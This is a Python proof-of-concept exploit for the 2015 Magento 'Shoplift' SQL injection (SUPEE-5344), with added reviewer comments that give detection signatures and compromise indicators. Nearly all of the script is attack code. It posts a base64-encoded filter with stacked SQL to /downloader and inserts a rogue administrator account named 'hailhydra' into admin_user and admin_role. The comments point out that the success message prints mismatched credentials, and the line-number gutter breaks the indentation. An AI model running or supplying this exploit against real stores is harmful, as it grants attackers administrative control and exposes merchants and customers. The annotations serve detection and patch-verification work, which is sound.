  # Reviewer note: 2015 proof-of-concept for the Magento "Shoplift" SQL injection through the
  # /downloader endpoint; the vendor patch named in the title (SUPEE-5344) is the fix. The paste
  # lost its original indentation and carries a line-number gutter, so the text below is not
  # directly runnable; it is kept here as a reference for detection and patch-verification work.
  1. ##################################################################################################
  2.  
  3. #Exploit Title : Magento Shoplift exploit (SUPEE-5344)
  4.  
  5. #Author : Manish Kishan Tanwar AKA error1046
  6.  
  7. #Date : 25/08/2015
  8.  
  9. #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
  10.  
  11. #Debugged At : Indishell Lab(originally developed by joren)
  12.  
  13. ##################################################################################################
  14.  
  15.  
  16.  
  17. import requests
  18.  
  19. import base64
  20.  
  21. import sys
  22.  
  23.  
  24.  
  # Placeholder base URL; the two checks below only normalise the scheme and trailing slash.
  25. target = "http://target.com/"
  26.  
  27.  
  28.  
  29. if not target.startswith("http"):
  30.  
  31. target = "http://" + target
  32.  
  33.  
  34.  
  35. if target.endswith("/"):
  36.  
  37. target = target[:-1]
  38.  
  39.  
  40.  
  # The vulnerable entry point is the Magento Connect downloader, i.e. <site>/downloader.
  # Defender note: on a patched or hardened install this path should be blocked or removed;
  # POST traffic to it is the first thing to alert on.
  41. target_url = target + "/downloader"
  42.  
  43.  
  44.  
  # Payload template: SQL statements that create an admin_user row and a matching admin_role row.
  # Defender/IR note: the artifacts this PoC leaves in the database are an admin_user row with
  # username 'hailhydra' (from the .format call further down), firstname 'Firstname',
  # lastname 'Lastname', email 'email@example.com', plus an admin_role row named 'Firstname'
  # with role_type 'U' — these are the values to search for when checking for compromise.
  45. q="""
  46.  
  47. SET @SALT = 'rp';
  48.  
  49. SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
  50.  
  51. SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
  52.  
  53. INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
  54.  
  55. INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
  56.  
  57. """
  58.  
  59.  
  60.  
  61.  
  62.  
  # Newlines are stripped so the whole statement batch fits in one query-string value.
  63. query = q.replace("\n", "").format(username="hailhydra", password="hailhydra")
  64.  
  # The injection point is the popularity[field_expr] filter parameter: the ");" closes the
  # expression the application builds and the SQL above is appended after it.
  # Defender note: a request whose decoded "filter" value contains "popularity[field_expr]="
  # followed by a ")" and SQL keywords is a reliable signature for this PoC.
  65. pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
  66.  
  67.  
  68.  
  69. # e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
  70.  
  # Single POST carrying three form fields: ___directive (the base64 block directive decoded in
  # the author's comment above), filter (base64 of pfilter) and forwarded.
  # Defender note: these three parameter names together on a POST to /downloader are the
  # request-level indicator to log and block; the base64 in "filter" must be decoded before
  # any content inspection rule can see the SQL.
  71. r = requests.post(target_url,
  72.  
  73. data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
  74.  
  75. "filter": base64.b64encode(pfilter),
  76.  
  77. "forwarded": 1})
  78.  
  # The success message is only keyed on the HTTP status; it does not confirm the rows were
  # written. Note also that the credentials it prints (forme:forme) are not the ones the query
  # above inserts (hailhydra) — IR should search for the username actually used in the SQL.
  79. if r.ok:
  80.  
  81. print ("WORKED")
  82.  
  83. print ("Check {0}/admin with creds forme:forme".format(target))
  84.  
  85. else:
  86. print (r.text)
  87.  
  88. print "DID NOT WORK"